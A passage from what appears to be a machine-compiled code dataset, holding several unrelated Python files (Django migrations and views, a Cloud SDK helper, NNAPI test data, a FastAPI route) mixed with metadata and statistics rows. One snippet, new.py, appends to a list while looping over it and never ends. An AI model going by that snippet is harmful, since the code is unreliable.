self._pub_face_posintion = rospy.Publisher("/face_position", Point)
self._pub_demo_mode = rospy.Publisher(ns + "/mode_command", String)
| 23.666667 | 75 | 0.735915 | 39 | 284 | 5 | 0.589744 | 0.071795 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172535 | 284 | 11 | 76 | 25.818182 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0.095745 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
2c437452715dcd6c0879030ae27ac9df8eef1fd5 | 78 | py | Python | new.py | 7wikd/R_Pi-Surveillance | fa488a72b022af2e92e9c8b4c164469625c486d2 | [
"MIT"
] | null | null | null | new.py | 7wikd/R_Pi-Surveillance | fa488a72b022af2e92e9c8b4c164469625c486d2 | [
"MIT"
] | null | null | null | new.py | 7wikd/R_Pi-Surveillance | fa488a72b022af2e92e9c8b4c164469625c486d2 | [
"MIT"
] | null | null | null | array = ['Welcome','to','Turing']
for i in array:
array.append(i.upper()) | 19.5 | 33 | 0.615385 | 12 | 78 | 4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 78 | 4 | 34 | 19.5 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
2c473e776ed2f110c71b7f90a9480af3f31fea9b | 767 | py | Python | tur/migrations/0003_auto_20190319_1319.py | kopuskopecik/projem | 738b0eeb2bf407b4ef54197cce1ce26ea67279c8 | [
"MIT"
] | 2 | 2021-03-15T08:04:04.000Z | 2021-03-15T08:04:11.000Z | tur/migrations/0003_auto_20190319_1319.py | kopuskopecik/projem | 738b0eeb2bf407b4ef54197cce1ce26ea67279c8 | [
"MIT"
] | null | null | null | tur/migrations/0003_auto_20190319_1319.py | kopuskopecik/projem | 738b0eeb2bf407b4ef54197cce1ce26ea67279c8 | [
"MIT"
] | null | null | null | # Generated by Django 2.0 on 2019-03-19 10:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tur', '0002_dersler_updating_date'),
]
operations = [
migrations.AddField(
model_name='dersler',
name='anahtar',
field=models.CharField(default='Python Dersleri', max_length=500),
),
migrations.AddField(
model_name='dersler',
name='descriptions',
field=models.CharField(default='Python Dersleri', max_length=500),
),
migrations.AddField(
model_name='dersler',
name='slug2',
field=models.SlugField(default='python', max_length=130),
),
]
| 26.448276 | 78 | 0.581486 | 75 | 767 | 5.826667 | 0.533333 | 0.12357 | 0.157895 | 0.185355 | 0.503432 | 0.503432 | 0.416476 | 0.416476 | 0.416476 | 0.416476 | 0 | 0.052142 | 0.29987 | 767 | 28 | 79 | 27.392857 | 0.761639 | 0.056063 | 0 | 0.5 | 1 | 0 | 0.152355 | 0.036011 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
2c5ee4c680422e39bc1b4f05645d8e4538d7cf7f | 108 | py | Python | Lib/site-packages/MySQLdb/release.py | pavanmaganti9/djangoapp | d6210386af89af9dae6397176a26a8fcd588d3b4 | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/MySQLdb/release.py | pavanmaganti9/djangoapp | d6210386af89af9dae6397176a26a8fcd588d3b4 | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/MySQLdb/release.py | pavanmaganti9/djangoapp | d6210386af89af9dae6397176a26a8fcd588d3b4 | [
"bzip2-1.0.6"
] | null | null | null |
__author__ = "Inada Naoki <songofacandy@gmail.com>"
version_info = (1,4,2,'final',0)
__version__ = "1.4.2"
| 21.6 | 51 | 0.694444 | 17 | 108 | 3.882353 | 0.764706 | 0.060606 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072917 | 0.111111 | 108 | 4 | 52 | 27 | 0.614583 | 0 | 0 | 0 | 0 | 0 | 0.429907 | 0.224299 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
2c89e2ba0b4512654d615954e75150a63b7f9ef4 | 1,236 | py | Python | mysite/organization/views.py | dduong711/test_project | 80ea8dd3944f6968bb872454adc752851da9547d | [
"MIT"
] | null | null | null | mysite/organization/views.py | dduong711/test_project | 80ea8dd3944f6968bb872454adc752851da9547d | [
"MIT"
] | null | null | null | mysite/organization/views.py | dduong711/test_project | 80ea8dd3944f6968bb872454adc752851da9547d | [
"MIT"
] | null | null | null | from django.views.generic.edit import CreateView
from django.views.generic.detail import DetailView
from django.urls import reverse, reverse_lazy
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.shortcuts import redirect
from .models import Organization
from .forms import OrganizationCreationForm
class OrganizationCreateView(CreateView):
model = Organization
form_class = OrganizationCreationForm
template_name = "organization/create.html"
success_url = reverse_lazy("organization:detail")
def form_valid(self, form):
self.object = form.save(username=self.request.user.username)
return redirect(self.get_success_url())
class OrganizationDetailView(DetailView):
model = Organization
template_name = "organization/detail.html"
def get_object(self, query_set=None):
return self.request.user.organization
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
if self.request.user.user_type == "OR":
return super().dispatch(request, *args, **kwargs)
return redirect(reverse("users:detail", kwargs={"username": self.request.user.username}))
| 36.352941 | 97 | 0.758091 | 144 | 1,236 | 6.395833 | 0.402778 | 0.065147 | 0.065147 | 0.047774 | 0.067318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149676 | 1,236 | 33 | 98 | 37.454545 | 0.876308 | 0 | 0 | 0.076923 | 0 | 0 | 0.072006 | 0.038835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.307692 | 0.038462 | 0.884615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
2c9913a7e96be804ee8e70f67be4b2d734c70392 | 213 | py | Python | tests/write-tests/test_display.py | focolab/gcamp-extractor | 5e47ab2cfb75e3f09cfd84d40d8be0739a75d39c | [
"MIT"
] | null | null | null | tests/write-tests/test_display.py | focolab/gcamp-extractor | 5e47ab2cfb75e3f09cfd84d40d8be0739a75d39c | [
"MIT"
] | 26 | 2022-03-01T17:34:45.000Z | 2022-03-31T00:09:55.000Z | tests/write-tests/test_display.py | focolab/gcamp-extractor | 5e47ab2cfb75e3f09cfd84d40d8be0739a75d39c | [
"MIT"
] | null | null | null | import sys
sys.path.append('/Users/stevenban/Documents/eats_worm/eats_worm')
from Extractor import *
from Threads import *
from Curator import *
e = load_extractor(default_arguments['root'])
c = Curator(e)
| 14.2 | 65 | 0.755869 | 30 | 213 | 5.233333 | 0.633333 | 0.101911 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131455 | 213 | 14 | 66 | 15.214286 | 0.848649 | 0 | 0 | 0 | 0 | 0 | 0.240385 | 0.221154 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
2ccd49d6599f180bbe48d3dfa5a06f69594bc05a | 436 | py | Python | apollo/pipeline/pipeline/job.py | ZeyadOsama/apollo | 89e7d7b264b78ace7ef4239899e2dab2568174fa | [
"MIT"
] | null | null | null | apollo/pipeline/pipeline/job.py | ZeyadOsama/apollo | 89e7d7b264b78ace7ef4239899e2dab2568174fa | [
"MIT"
] | 1 | 2021-07-18T12:40:59.000Z | 2021-07-18T12:40:59.000Z | apollo/pipeline/pipeline/job.py | ZeyadOsama/apollo | 89e7d7b264b78ace7ef4239899e2dab2568174fa | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""job.py: File containing Job class to be used as the executors for the pipeline."""
__author__ = "Zeyad Osama"
class Job:
"""
Job class to be used as the executors for the pipeline.
"""
def __init__(self) -> None:
super().__init__()
def initialize(self):
pass
def terminate(self):
pass
def feed(self):
pass
def execute(self):
pass
| 16.148148 | 85 | 0.587156 | 57 | 436 | 4.280702 | 0.526316 | 0.131148 | 0.135246 | 0.098361 | 0.360656 | 0.360656 | 0.360656 | 0.360656 | 0.360656 | 0.360656 | 0 | 0 | 0.305046 | 436 | 26 | 86 | 16.769231 | 0.805281 | 0.357798 | 0 | 0.333333 | 0 | 0 | 0.042471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.416667 | false | 0.333333 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
2ccd6ca54c6dd2ea4416c6e6ab209109389b62c9 | 1,858 | py | Python | lib/googlecloudsdk/command_lib/config/virtualenv/util.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/googlecloudsdk/command_lib/config/virtualenv/util.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/command_lib/config/virtualenv/util.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library of methods for manipulating virtualenv setup."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
from googlecloudsdk.core.util import files
from googlecloudsdk.core.util import platforms
import six
# Python modules to install into virtual env environment
MODULES = ['crcmod', 'grpcio', 'cryptography', 'google_crc32c', 'certifi']
# Enable file name.
ENABLE_FILE = 'enabled'
def IsPy2():
"""Wrap six.PY2, needed because mocking six.PY2 breaks test lib things."""
return six.PY2
def IsWindows():
"""Wrapped because mocking directly can break test lib things."""
return platforms.OperatingSystem.IsWindows()
def VirtualEnvExists(ve_dir):
"""Returns True if Virtual Env already exists."""
return os.path.isdir(ve_dir)
def EnableFileExists(ve_dir):
"""Returns True if enable file exists."""
return os.path.exists('{}/{}'.format(ve_dir, ENABLE_FILE))
def CreateEnableFile(ve_dir):
"""Create enable file."""
files.WriteFileContents('{}/{}'.format(ve_dir, ENABLE_FILE), 'enabled')
def RmEnableFile(ve_dir):
"""Remove enable file."""
os.unlink('{}/{}'.format(ve_dir, ENABLE_FILE))
| 29.492063 | 76 | 0.745425 | 256 | 1,858 | 5.285156 | 0.550781 | 0.059128 | 0.047302 | 0.037694 | 0.120473 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009458 | 0.146394 | 1,858 | 62 | 77 | 29.967742 | 0.843632 | 0.52099 | 0 | 0 | 0 | 0 | 0.087112 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.363636 | 0 | 0.818182 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e2c1f25eae995daf15cfeb601d8c6e07d2c00522 | 850 | py | Python | 2015/21_rpg_test.py | pchudzik/adventofcode | e1d6521621f6ca90f9dc53cf3d1ed5b8c5c2b7d1 | [
"MIT"
] | null | null | null | 2015/21_rpg_test.py | pchudzik/adventofcode | e1d6521621f6ca90f9dc53cf3d1ed5b8c5c2b7d1 | [
"MIT"
] | null | null | null | 2015/21_rpg_test.py | pchudzik/adventofcode | e1d6521621f6ca90f9dc53cf3d1ed5b8c5c2b7d1 | [
"MIT"
] | null | null | null | import importlib
rpg_module = importlib.import_module("21_rpg")
Character = rpg_module.Character
encounter = rpg_module.encounter
simulate_battle = rpg_module.simulate_battle
def test_encounter():
player = Character(8, 5, 5)
boss = Character(12, 7, 2)
assert encounter(player, boss) is None
assert boss.hit_points == 9
assert player.hit_points == 6
assert encounter(player, boss) is None
assert boss.hit_points == 6
assert player.hit_points == 4
assert encounter(player, boss) is None
assert boss.hit_points == 3
assert player.hit_points == 2
assert encounter(player, boss) is player
assert boss.hit_points == 0
assert player.hit_points == 2
def test_simulate_battle():
player = Character(8, 5, 5)
boss = Character(12, 7, 2)
assert simulate_battle(player, boss) == player
| 24.285714 | 50 | 0.703529 | 120 | 850 | 4.816667 | 0.233333 | 0.124567 | 0.145329 | 0.17301 | 0.513841 | 0.439446 | 0.391003 | 0.391003 | 0.391003 | 0.391003 | 0 | 0.035451 | 0.203529 | 850 | 34 | 51 | 25 | 0.818316 | 0 | 0 | 0.375 | 0 | 0 | 0.007059 | 0 | 0 | 0 | 0 | 0 | 0.541667 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e2daf5c89878da51cbda4e6d7296e048a9f4b24c | 695 | py | Python | app/mysql-sqlalchemy.py | garryforgit/flasky | 7117023bf69180b8eacae9dde69c621668ddf11d | [
"MIT"
] | null | null | null | app/mysql-sqlalchemy.py | garryforgit/flasky | 7117023bf69180b8eacae9dde69c621668ddf11d | [
"MIT"
] | null | null | null | app/mysql-sqlalchemy.py | garryforgit/flasky | 7117023bf69180b8eacae9dde69c621668ddf11d | [
"MIT"
] | null | null | null | # coding:utf-8
from flask_sqlalchemy import SQLAlchemy
from hello import db
#SQLALCHEMY_DATABASE_URL="mysql://fly:('flyfly')@localhost/test1"
#SQLALCHEMY_TRACK_MODIFICATIONS = True
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
def __repr__(self):
return '<Role %r>' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return '<User %r>' % self.username
| 24.821429 | 65 | 0.684892 | 96 | 695 | 4.708333 | 0.447917 | 0.088496 | 0.110619 | 0.079646 | 0.311947 | 0.269912 | 0.269912 | 0.146018 | 0 | 0 | 0 | 0.010435 | 0.172662 | 695 | 27 | 66 | 25.740741 | 0.775652 | 0.16259 | 0 | 0.266667 | 0 | 0 | 0.062284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0.133333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
e2e93dbd6f3076026b046be68bc59debb3b4ccbc | 775 | py | Python | notes/_views/viewsets.py | Merino/poc-cbb | eed2226a7d7fbff5d8860075fbdd641f5281dce5 | [
"BSD-3-Clause"
] | null | null | null | notes/_views/viewsets.py | Merino/poc-cbb | eed2226a7d7fbff5d8860075fbdd641f5281dce5 | [
"BSD-3-Clause"
] | 1 | 2016-01-19T12:32:32.000Z | 2016-01-19T12:32:32.000Z | notes/_views/viewsets.py | Merino/poc-cbb | eed2226a7d7fbff5d8860075fbdd641f5281dce5 | [
"BSD-3-Clause"
] | null | null | null | # # encoding: utf-8
#
# from django.conf.urls import patterns, include
# from django.core.urlresolvers import reverse_lazy
#
#
# class BaseViewSet(object):
# def __init__(self, **kwargs):
# super(BaseViewSet, self).__init__()
# for key, value in kwargs.iteritems():
# assert hasattr(self, key), 'Pass unknown parameter'
# setattr(self, key, value)
#
# def get_urls(self):
# urls = []
# nested = patterns('', *urls)
# return include(nested)
#
# def reverse(self, name, *args, **kwargs):
# return reverse_lazy(name, args=args, kwargs=kwargs)
#
# @property
# def urls(self):
# if not hasattr(self, '_urls'):
# self._urls = self.get_urls()
# return self._urls | 29.807692 | 65 | 0.587097 | 87 | 775 | 5.057471 | 0.471264 | 0.072727 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00177 | 0.270968 | 775 | 26 | 66 | 29.807692 | 0.776991 | 0.930323 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
390037201d83cd63c3a8e971c39f1519d819722c | 2,052 | py | Python | blog/migrations/0005_auto_20190624_1315.py | Labbit-kw/hologram-project | 708b773e932f6ad0f92d1d9e2e57cfbd8b17b933 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20190624_1315.py | Labbit-kw/hologram-project | 708b773e932f6ad0f92d1d9e2e57cfbd8b17b933 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20190624_1315.py | Labbit-kw/hologram-project | 708b773e932f6ad0f92d1d9e2e57cfbd8b17b933 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.2 on 2019-06-24 04:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_board'),
]
operations = [
migrations.DeleteModel(
name='Board',
),
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-comments',), 'verbose_name': 'post', 'verbose_name_plural': 'posts'},
),
migrations.RemoveField(
model_name='post',
name='content',
),
migrations.RemoveField(
model_name='post',
name='create_date',
),
migrations.RemoveField(
model_name='post',
name='description',
),
migrations.RemoveField(
model_name='post',
name='modify_date',
),
migrations.RemoveField(
model_name='post',
name='slug',
),
migrations.AddField(
model_name='post',
name='comments',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='post',
name='date',
field=models.DateField(auto_now_add=True, null=True, verbose_name='Create Date'),
),
migrations.AddField(
model_name='post',
name='name',
field=models.CharField(blank=True, max_length=100),
),
migrations.AddField(
model_name='post',
name='user_id',
field=models.CharField(blank=True, max_length=20),
),
migrations.AddField(
model_name='post',
name='views',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(blank=True, max_length=100),
),
migrations.DeleteModel(
name='Comment',
),
]
| 27.72973 | 105 | 0.515595 | 180 | 2,052 | 5.744444 | 0.338889 | 0.10058 | 0.138298 | 0.180851 | 0.573501 | 0.573501 | 0.313346 | 0.195358 | 0.098646 | 0 | 0 | 0.020501 | 0.358187 | 2,052 | 73 | 106 | 28.109589 | 0.764617 | 0.02193 | 0 | 0.61194 | 1 | 0 | 0.109227 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3903624fd80c505f90cadf8b4dfe22f77c2294fc | 647 | py | Python | rosmap/repository_analyzers/offline/i_repository_analyzer.py | jr-robotics/rosmap | eae425c94b43e46227a11d645bb7baa1fc5c5b35 | [
"MIT"
] | 9 | 2019-02-06T10:02:02.000Z | 2022-02-24T16:38:36.000Z | rosmap/repository_analyzers/offline/i_repository_analyzer.py | jr-robotics/rosmap | eae425c94b43e46227a11d645bb7baa1fc5c5b35 | [
"MIT"
] | null | null | null | rosmap/repository_analyzers/offline/i_repository_analyzer.py | jr-robotics/rosmap | eae425c94b43e46227a11d645bb7baa1fc5c5b35 | [
"MIT"
] | 1 | 2020-01-13T00:43:03.000Z | 2020-01-13T00:43:03.000Z | from abc import ABCMeta, abstractmethod
class IRepositoryAnalyzer(object):
"""
Interface for classes implementing Repository-analysis.
"""
__metaclass__ = ABCMeta
@abstractmethod
def analyze_repositories(self, path: str, repo_details: dict) -> None:
"""
Analyzes all repositories directly under the root of the given path (does not recurse).
:param path: Path to the repositories.
:param repo_details: Details about the repositories.
:return: None
"""
raise NotImplementedError
@abstractmethod
def analyzes(self) -> str:
raise NotImplementedError
| 28.130435 | 95 | 0.673879 | 65 | 647 | 6.6 | 0.646154 | 0.097902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.255023 | 647 | 22 | 96 | 29.409091 | 0.890041 | 0.384853 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
39080a3dcea4b5bb7e1c10d7b1be6ca6edf82165 | 2,814 | py | Python | tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py | periannath/ONE | 61e0bdf2bcd0bc146faef42b85d469440e162886 | [
"Apache-2.0"
] | 255 | 2020-05-22T07:45:29.000Z | 2022-03-29T23:58:22.000Z | tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py | periannath/ONE | 61e0bdf2bcd0bc146faef42b85d469440e162886 | [
"Apache-2.0"
] | 5,102 | 2020-05-22T07:48:33.000Z | 2022-03-31T23:43:39.000Z | tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py | periannath/ONE | 61e0bdf2bcd0bc146faef42b85d469440e162886 | [
"Apache-2.0"
] | 120 | 2020-05-22T07:51:08.000Z | 2022-02-16T19:08:05.000Z | #
# Copyright (C) 2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# model
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 0
i2 = Input("op2", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 1
i3 = Input("op3", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 2
axis0 = Int32Scalar("axis0", 3)
r = Output("result", "TENSOR_FLOAT32", "{1, 2, 3, 6}") # output
model = model.Operation("CONCATENATION", i1, i2, i3, axis0).To(r)
# Example 1.
input0 = {i1: [-0.03203143, -0.0334147 , -0.02527265, 0.04576106, 0.08869292,
0.06428383, -0.06473722, -0.21933985, -0.05541003, -0.24157837,
-0.16328812, -0.04581105],
i2: [-0.0569439 , -0.15872048, 0.02965238, -0.12761882, -0.00185435,
-0.03297619, 0.03581043, -0.12603407, 0.05999133, 0.00290503,
0.1727029 , 0.03342071],
i3: [ 0.10992613, 0.09185287, 0.16433905, -0.00059073, -0.01480746,
0.0135175 , 0.07129054, -0.15095694, -0.04579685, -0.13260484,
-0.10045543, 0.0647094 ]}
output0 = {r: [-0.03203143, -0.0334147 , -0.0569439 , -0.15872048, 0.10992613,
0.09185287, -0.02527265, 0.04576106, 0.02965238, -0.12761882,
0.16433905, -0.00059073, 0.08869292, 0.06428383, -0.00185435,
-0.03297619, -0.01480746, 0.0135175 , -0.06473722, -0.21933985,
0.03581043, -0.12603407, 0.07129054, -0.15095694, -0.05541003,
-0.24157837, 0.05999133, 0.00290503, -0.04579685, -0.13260484,
-0.16328812, -0.04581105, 0.1727029 , 0.03342071, -0.10045543,
0.0647094 ]}
# Instantiate an example
Example((input0, output0))
'''
# The above data was generated with the code below:
with tf.Session() as sess:
t1 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t2 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t3 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
c1 = tf.concat([t1, t2, t3], axis=3)
print(c1) # print shape
print( sess.run([tf.reshape(t1, [12]),
tf.reshape(t2, [12]),
tf.reshape(t3, [12]),
tf.reshape(c1, [1*2*3*(2*3)])]))
'''
| 43.292308 | 79 | 0.602701 | 406 | 2,814 | 4.160099 | 0.369458 | 0.010657 | 0.01421 | 0.016578 | 0.448786 | 0.120782 | 0.120782 | 0.120782 | 0.071048 | 0.071048 | 0 | 0.346369 | 0.236674 | 2,814 | 64 | 80 | 43.96875 | 0.439944 | 0.236318 | 0 | 0 | 0 | 0 | 0.086984 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
390b1fb2d4091aecc904734a5d0a639eb8b4e4a8 | 519 | py | Python | routers/epic.py | chenx6/message-integration-api | 5a80eac8d72620af87bbdb16cf489858001c9d8f | [
"MIT"
] | null | null | null | routers/epic.py | chenx6/message-integration-api | 5a80eac8d72620af87bbdb16cf489858001c9d8f | [
"MIT"
] | null | null | null | routers/epic.py | chenx6/message-integration-api | 5a80eac8d72620af87bbdb16cf489858001c9d8f | [
"MIT"
] | null | null | null | from fastapi import APIRouter, Depends
from sqlalchemy.orm import Session
from schemas.item_resp import ItemsResp
from crud.epic_free_game import get_epic_free_game
from utils import get_db
router = APIRouter(prefix="/api", tags=["epic"])
@router.get("/epic", response_model=ItemsResp)
async def epic_free_game(start: int = 0, db: Session = Depends(get_db)):
if start != 0:
return ItemsResp(status="fail", items=[])
items = get_epic_free_game(db)
return ItemsResp(status="success", items=items)
